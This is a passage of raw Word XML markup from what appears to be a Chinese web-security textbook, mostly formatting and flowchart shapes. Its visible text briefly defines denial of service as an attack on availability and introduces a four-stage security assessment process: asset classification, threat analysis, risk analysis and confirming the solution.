          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>。拒绝服务攻击破坏的是安全的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t>可用性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="218" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>在安全领域中，最基本的要素就是这三个，后来还有人想扩充这些要素，增加了诸如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>可审</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>计性、不可抵赖性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>等，但最最重要的还是以上三个要素。在设计安全方案时，也要以这三个要素为基本的出发点，去全面地思考所面对的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250010" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>如何实施安全评估</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="299"/>
        <w:ind w:left="203" w:right="179" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:166.050003pt;margin-top:51.599987pt;width:102.55pt;height:29.45pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2584;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="3321,1032" coordsize="2051,589">
            <v:shape style="position:absolute;left:3341;top:1072;width:2030;height:549" coordorigin="3341,1072" coordsize="2030,549" path="m3453,1072l3433,1074,3427,1075,3412,1080,3407,1082,3393,1090,3388,1093,3376,1103,3372,1107,3362,1119,3359,1124,3351,1138,3349,1143,3344,1158,3343,1164,3341,1181,3341,1510,3343,1529,3344,1535,3349,1550,3351,1555,3359,1569,3362,1574,3372,1586,3376,1590,3388,1600,3393,1604,3407,1611,3412,1613,3427,1618,3433,1619,3450,1621,5260,1621,5279,1619,5285,1618,5300,1613,5306,1611,5319,1604,5324,1600,5336,1591,3453,1591,3421,1585,3395,1567,3377,1541,3371,1510,3371,1183,3377,1152,3395,1126,3421,1108,3453,1102,5335,1102,5325,1093,5319,1090,5306,1082,5300,1080,5285,1075,5279,1074,5263,1072,3453,1072xm5260,1102l3453,1102,3421,1108,3395,1126,3377,1152,3371,1183,3371,1510,3377,1541,3395,1567,3421,1585,3453,1591,5260,1591,5291,1585,5317,1567,5321,1561,3456,1561,3442,1560,3433,1557,3424,1552,3416,1546,3410,1538,3405,1529,3402,1520,3401,1510,3401,1187,3402,1173,3405,1164,3410,1155,3417,1147,3424,1141,3433,1136,3443,1133,3453,1132,5321,1132,5317,1126,5291,1108,5260,1102xm5335,1102l5260,1102,5291,1108,5317,1126,5335,1152,5341,1183,5341,1510,5335,1541,5317,1567,5291,1585,5260,1591,5336,1591,5336,1590,5340,1586,5350,1574,5354,1569,5361,1555,5363,1550,5368,1535,5369,1529,5371,1513,5371,1183,5369,1164,5368,1158,5363,1143,5361,1138,5354,1124,5350,1119,5340,1107,5337,1103,5335,1102xm5257,1132l3453,1132,3443,1133,3433,1136,3424,1141,3417,1147,3410,1155,3405,1164,3402,1173,3401,1183,3401,1510,3402,1520,3405,1529,3410,1538,3416,1546,3424,1552,3433,1557,3442,1560,3456,1561,5260,1561,5271,1560,5279,1557,5288,1552,5296,1546,5302,1538,5307,1529,5310,1521,5311,1509,5311,1183,5310,1173,5307,1164,5302,1155,5296,1147,5288,1141,5279,1136,5270,1133,5257,1132xm5321,1132l5257,1132,5270,1133,5279,1136,5288,1141,5296,1147,5302,1155,5307,1164,5310,1173,5311,1183,5311,1507,5310,1521,5307,1529,5302,1538,5296,1546,5288,1552,5279,1557,5271,1560,5260,1561,3456,1561,5321,1561,5335,1541,5341,1510,5341,1183,5335,1152,5321,1132xe" filled="true" fillcolor="#243f60" stroked="false">
              <v:path arrowok="t"/>
              <v:fill opacity="32896f" type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3351;top:1062;width:1970;height:489" coordorigin="3351,1062" coordsize="1970,489" path="m5240,1062l3433,1062,3401,1068,3375,1086,3357,1112,3351,1143,3351,1469,3357,1501,3375,1527,3401,1545,3433,1551,5240,1551,5271,1545,5297,1527,5315,1501,5321,1469,5321,1143,5315,1112,5297,1086,5271,1068,5240,1062xe" filled="true" fillcolor="#4f81bd" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3351;top:1062;width:1970;height:489" coordorigin="3351,1062" coordsize="1970,489" path="m3433,1062l3401,1068,3375,1086,3357,1112,3351,1143,3351,1469,3357,1501,3375,1527,3401,1545,3433,1551,5240,1551,5271,1545,5297,1527,5315,1501,5321,1469,5321,1143,5315,1112,5297,1086,5271,1068,5240,1062,3433,1062xe" filled="false" stroked="true" strokeweight="3pt" strokecolor="#f2f2f2">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3321;top:1032;width:2051;height:589" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto" w:before="4"/>
                      <w:rPr>
                        <w:sz w:val="14"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="0"/>
                      <w:ind w:left="564" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="FFFFFF"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>资产等级划分</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>有了前面的基础，我们就可以正式开始分析并解决安全问题了。一个安全评估的过程，可以简单地分为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>个阶段：资产等级划分、威胁分析、风险分析、确认解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="3241"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="width:102.55pt;height:62.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="0,0" coordsize="2051,1259">
            <v:shape style="position:absolute;left:20;top:710;width:2030;height:549" coordorigin="20,710" coordsize="2030,549" path="m132,710l112,712,106,713,91,718,86,720,72,728,67,731,55,741,51,745,41,757,38,762,30,776,28,781,23,796,22,802,20,819,20,1148,22,1167,23,1173,28,1188,30,1193,38,1207,41,1212,51,1224,55,1228,67,1238,72,1242,86,1249,91,1251,106,1256,112,1257,129,1259,1939,1259,1958,1257,1964,1256,1979,1251,1984,1249,1998,1242,2003,1238,2015,1229,132,1229,100,1223,74,1205,56,1179,50,1148,50,822,56,790,74,764,100,746,132,740,2014,740,2004,731,1998,728,1984,720,1979,718,1964,713,1958,712,1942,710,132,710xm1938,740l132,740,100,746,74,764,56,790,50,822,50,1148,56,1179,74,1205,100,1223,132,1229,1938,1229,1970,1223,1996,1205,2000,1199,135,1199,121,1198,112,1195,103,1190,95,1184,89,1176,84,1167,81,1158,80,1148,80,825,81,811,84,802,89,793,96,785,103,779,112,774,122,771,132,770,2000,770,1996,764,1970,746,1938,740xm2014,740l1938,740,1970,746,1996,764,2014,790,2020,822,2020,1148,2014,1179,1996,1205,1970,1223,1938,1229,2015,1229,2015,1228,2019,1224,2029,1212,2033,1207,2040,1193,2042,1188,2047,1173,2048,1167,2050,1151,2050,822,2048,802,2047,796,2042,781,2040,776,2032,762,2029,757,2019,745,2016,741,2014,740xm1936,770l132,770,122,771,112,774,103,779,96,785,89,793,84,802,81,811,80,822,80,1148,81,1158,84,1167,89,1176,95,1184,103,1190,112,1195,121,1198,135,1199,1939,1199,1950,1198,1958,1195,1967,1190,1975,1184,1981,1176,1986,1167,1989,1159,1990,1148,1990,822,1989,811,1986,802,1981,793,1975,785,1967,779,1958,774,1949,771,1936,770xm2000,770l1936,770,1949,771,1958,774,1967,779,1975,785,1981,793,1986,802,1989,811,1990,822,1990,1145,1989,1159,1986,1167,1981,1176,1975,1184,1967,1190,1958,1195,1950,1198,1939,1199,135,1199,2000,1199,2014,1179,2020,1148,2020,822,2014,790,2000,770xe" filled="true" fillcolor="#243f60" stroked="false">
              <v:path arrowok="t"/>
              <v:fill opacity="32896f" type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:30;top:700;width:1970;height:489" coordorigin="30,700" coordsize="1970,489" path="m1918,700l111,700,80,706,54,724,36,750,30,782,30,1108,36,1139,54,1165,80,1183,111,1189,1918,1189,1950,1183,1976,1165,1994,1139,2000,1108,2000,782,1994,750,1976,724,1950,706,1918,700xe" filled="true" fillcolor="#4f81bd" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:30;top:700;width:1970;height:489" coordorigin="30,700" coordsize="1970,489" path="m111,700l80,706,54,724,36,750,30,782,30,1108,36,1139,54,1165,80,1183,111,1189,1918,1189,1950,1183,1976,1165,1994,1139,2000,1108,2000,782,1994,750,1976,724,1950,706,1918,700,111,700xe" filled="false" stroked="true" strokeweight="3pt" strokecolor="#f2f2f2">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:783;top:40;width:503;height:570" coordorigin="784,40" coordsize="503,570" path="m1147,40l924,40,924,416,784,416,1035,610,1084,572,1035,572,872,446,954,446,954,70,1147,70,1147,40xm1117,70l954,70,954,446,872,446,1035,572,1084,534,1035,534,960,476,984,476,984,100,1117,100,1117,70xm1147,70l1117,70,1117,446,1198,446,1035,572,1084,572,1286,416,1147,416,1147,70xm1110,476l960,476,1035,534,1110,476xm1117,100l1087,100,1087,476,1110,476,1035,534,1084,534,1198,446,1117,446,1117,100xm1087,100l984,100,984,476,1087,476,1087,100xe" filled="true" fillcolor="#205867" stroked="false">
              <v:path arrowok="t"/>
              <v:fill opacity="32896f" type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:852;top:30;width:326;height:502" coordorigin="852,30" coordsize="326,502" path="m1178,406l852,406,1015,532,1178,406xm1096,30l933,30,933,406,1096,406,1096,30xe" filled="true" fillcolor="#4bacc6" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:852;top:30;width:326;height:502" coordorigin="852,30" coordsize="326,502" path="m852,406l933,406,933,30,1096,30,1096,406,1178,406,1015,532,852,406xe" filled="false" stroked="true" strokeweight="3pt" strokecolor="#f2f2f2">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:713;top:872;width:625;height:152" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="151" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="FFFFFF"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>威胁分析</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="3241"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="width:102.55pt;height:94.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="0,0" coordsize="2051,1899">
            <v:shape style="position:absolute;left:20;top:680;width:2030;height:549" coordorigin="20,680" coordsize="2030,549" path="m132,680l112,682,106,683,91,688,86,690,72,698,67,701,55,711,51,715,41,727,38,732,30,746,28,751,23,766,22,772,20,789,20,1118,22,1137,23,1143,28,1158,30,1163,38,1177,41,1182,51,1194,55,1198,67,1208,72,1212,86,1219,91,1221,106,1226,112,1227,129,1229,1939,1229,1958,1227,1964,1226,1979,1221,1984,1219,1998,1212,2003,1208,2015,1199,132,1199,100,1193,74,1175,56,1149,50,1118,50,792,56,760,74,734,100,716,132,710,2014,710,2004,701,1998,698,1984,690,1979,688,1964,683,1958,682,1942,680,132,680xm1938,710l132,710,100,716,74,734,56,760,50,792,50,1118,56,1149,74,1175,100,1193,132,1199,1938,1199,1970,1193,1996,1175,2000,1169,135,1169,121,1168,112,1165,103,1160,95,1154,89,1146,84,1137,81,1128,80,1118,80,795,81,781,84,772,89,763,96,755,103,749,112,744,122,741,132,740,2000,740,1996,734,1970,716,1938,710xm2014,710l1938,710,1970,716,1996,734,2014,760,2020,792,2020,1118,2014,1149,1996,1175,1970,1193,1938,1199,2015,1199,2015,1198,2019,1194,2029,1182,2033,1177,2040,1163,2042,1158,2047,1143,2048,1137,2050,1121,2050,792,2048,772,2047,766,2042,751,2040,746,2032,732,2029,727,2019,715,2016,711,2014,710xm1936,740l132,740,122,741,112,744,103,749,96,755,89,763,84,772,81,781,80,792,80,1118,81,1128,84,1137,89,1146,95,1154,103,1160,112,1165,121,1168,135,1169,1939,1169,1950,1168,1958,1165,1967,1160,1975,1154,1981,1146,1986,1137,1989,1129,1990,1118,1990,792,1989,781,1986,772,1981,763,1975,755,1967,749,1958,744,1949,741,1936,740xm2000,740l1936,740,1949,741,1958,744,1967,749,1975,755,1981,763,1986,772,1989,781,1990,792,1990,1115,1989,1129,1986,1137,1981,1146,1975,1154,1967,1160,1958,1165,1950,1168,1939,1169,135,1169,2000,1169,2014,1149,2020,1118,2020,792,2014,760,2000,740xe" filled="true" fillcolor="#243f60" stroked="false">
              <v:path arrowok="t"/>
              <v:fill opacity="32896f" type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:30;top:670;width:1970;height:489" coordorigin="30,670" coordsize="1970,489" path="m1918,670l111,670,80,676,54,694,36,720,30,752,30,1078,36,1109,54,1135,80,1153,111,1159,1918,1159,1950,1153,1976,1135,1994,1109,2000,1078,2000,752,1994,720,1976,694,1950,676,1918,670xe" filled="true" fillcolor="#4f81bd" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:30;top:670;width:1970;height:489" coordorigin="30,670" coordsize="1970,489" path="m111,670l80,676,54,694,36,720,30,752,30,1078,36,1109,54,1135,80,1153,111,1159,1918,1159,1950,1153,1976,1135,1994,1109,2000,1078,2000,752,1994,720,1976,694,1950,676,1918,670,111,670xe" filled="false" stroked="true" strokeweight="3pt" strokecolor="#f2f2f2">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:783;top:40;width:503;height:570" coordorigin="784,40" coordsize="503,570" path="m1147,40l924,40,924,416,784,416,1035,610,1084,572,1035,572,872,446,954,446,954,70,1147,70,1147,40xm1117,70l954,70,954,446,872,446,1035,572,1084,534,1035,534,960,476,984,476,984,100,1117,100,1117,70xm1147,70l1117,70,1117,446,1198,446,1035,572,1084,572,1286,416,1147,416,1147,70xm1110,476l960,476,1035,534,1110,476xm1117,100l1087,100,1087,476,1110,476,1035,534,1084,534,1198,446,1117,446,1117,100xm1087,100l984,100,984,476,1087,476,1087,100xe" filled="true" fillcolor="#205867" stroked="false">
              <v:path arrowok="t"/>
              <v:fill opacity="32896f" type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:852;top:30;width:326;height:502" coordorigin="852,30" coordsize="326,502" path="m1178,406l852,406,1015,532,1178,406xm1096,30l933,30,933,406,1096,406,1096,30xe" filled="true" fillcolor="#4bacc6" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:852;top:30;width:326;height:502" coordorigin="852,30" coordsize="326,502" path="m852,406l933,406,933,30,1096,30,1096,406,1178,406,1015,532,852,406xe" filled="false" stroked="true" strokeweight="3pt" strokecolor="#f2f2f2">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:783;top:1329;width:503;height:570" coordorigin="784,1329" coordsize="503,570" path="m1147,1329l924,1329,924,1705,784,1705,1035,1899,1084,1861,1035,1861,872,1735,954,1735,954,1359,1147,1359,1147,1329xm1117,1359l954,1359,954,1735,872,1735,1035,1861,1084,1823,1035,1823,960,1765,984,1765,984,1389,1117,1389,1117,1359xm1147,1359l1117,1359,1117,1735,1198,1735,1035,1861,1084,1861,1286,1705,1147,1705,1147,1359xm1110,1765l960,1765,1035,1823,1110,1765xm1117,1389l1087,1389,1087,1765,1110,1765,1035,1823,1084,1823,1198,1735,1117,1735,1117,1389xm1087,1389l984,1389,984,1765,1087,1765,1087,1389xe" filled="true" fillcolor="#205867" stroked="false">
              <v:path arrowok="t"/>
              <v:fill opacity="32896f" type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:852;top:1319;width:326;height:502" coordorigin="852,1319" coordsize="326,502" path="m1178,1695l852,1695,1015,1821,1178,1695xm1096,1319l933,1319,933,1695,1096,1695,1096,1319xe" filled="true" fillcolor="#4bacc6" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:852;top:1319;width:326;height:502" coordorigin="852,1319" coordsize="326,502" path="m852,1695l933,1695,933,1319,1096,1319,1096,1695,1178,1695,1015,1821,852,1695xe" filled="false" stroked="true" strokeweight="3pt" strokecolor="#f2f2f2">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:713;top:843;width:625;height:152" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="151" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="FFFFFF"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>风险分析</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:166.050003pt;margin-top:5.734375pt;width:102.55pt;height:29.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2728;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="3321,115" coordsize="2051,590">
            <v:shape style="position:absolute;left:3341;top:154;width:2030;height:549" coordorigin="3341,155" coordsize="2030,549" path="m3453,155l3433,157,3427,158,3412,163,3407,165,3393,172,3388,176,3376,186,3372,190,3362,202,3359,207,3351,220,3349,226,3344,241,3343,247,3341,263,3341,592,3343,612,3344,618,3349,633,3351,638,3359,652,3362,657,3372,669,3376,673,3388,683,3393,686,3407,694,3412,696,3427,701,3433,702,3450,704,5260,704,5279,702,5285,701,5300,696,5306,694,5319,686,5324,683,5336,674,3453,674,3421,667,3395,650,3377,624,3371,592,3371,266,3377,234,3395,209,3421,191,3453,185,5335,185,5324,176,5319,172,5306,165,5300,163,5285,158,5279,157,5263,155,3453,155xm5260,185l3453,185,3421,191,3395,209,3377,234,3371,266,3371,592,3377,624,3395,650,3421,667,3453,674,5260,674,5291,667,5317,650,5321,644,3456,644,3442,643,3433,640,3424,635,3417,629,3410,621,3405,612,3402,602,3401,592,3401,269,3402,256,3405,247,3410,238,3416,230,3424,224,3433,219,3443,216,3453,215,5321,215,5317,209,5291,191,5260,185xm5335,185l5260,185,5291,191,5317,209,5335,234,5341,266,5341,592,5335,624,5317,650,5291,667,5260,674,5336,674,5336,673,5341,669,5351,657,5354,652,5361,638,5363,633,5368,618,5369,612,5371,595,5371,266,5369,247,5368,241,5363,226,5361,220,5354,207,5350,202,5340,190,5336,186,5335,185xm5257,215l3453,215,3443,216,3433,219,3424,224,3416,230,3410,238,3405,247,3402,256,3401,266,3401,592,3402,602,3405,612,3410,621,3417,629,3424,635,3433,640,3442,643,3456,644,5260,644,5271,643,5279,640,5288,635,5296,629,5302,621,5307,612,5310,603,5311,589,5311,266,5310,255,5307,247,5302,238,5296,230,5288,224,5279,219,5270,216,5257,215xm5321,215l5257,215,5270,216,5279,219,5288,224,5296,230,5302,238,5307,247,5310,255,5311,266,5311,589,5310,603,5307,612,5302,621,5296,629,5288,635,5279,640,5271,643,5260,644,3456,644,5321,644,5335,624,5341,592,5341,266,5335,234,5321,215xe" filled="true" fillcolor="#243f60" stroked="false">
              <v:path arrowok="t"/>
              <v:fill opacity="32896f" type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3351;top:144;width:1970;height:489" coordorigin="3351,145" coordsize="1970,489" path="m5240,145l3433,145,3401,151,3375,169,3357,194,3351,226,3351,552,3357,584,3375,610,3401,627,3433,634,5240,634,5271,627,5297,610,5315,584,5321,552,5321,226,5315,194,5297,169,5271,151,5240,145xe" filled="true" fillcolor="#4f81bd" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3351;top:144;width:1970;height:489" coordorigin="3351,145" coordsize="1970,489" path="m3433,145l3401,151,3375,169,3357,194,3351,226,3351,552,3357,584,3375,610,3401,627,3433,634,5240,634,5271,627,5297,610,5315,584,5321,552,5321,226,5315,194,5297,169,5271,151,5240,145,3433,145xe" filled="false" stroked="true" strokeweight="3pt" strokecolor="#f2f2f2">
              <v:path arrowok="t"/>
              <v:stroke dashstyle="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:3321;top:114;width:2051;height:590" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto" w:before="4"/>
                      <w:rPr>
                        <w:sz w:val="14"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="0"/>
                      <w:ind w:left="564" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="FFFFFF"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>确认解决方案</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>安全评估的过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
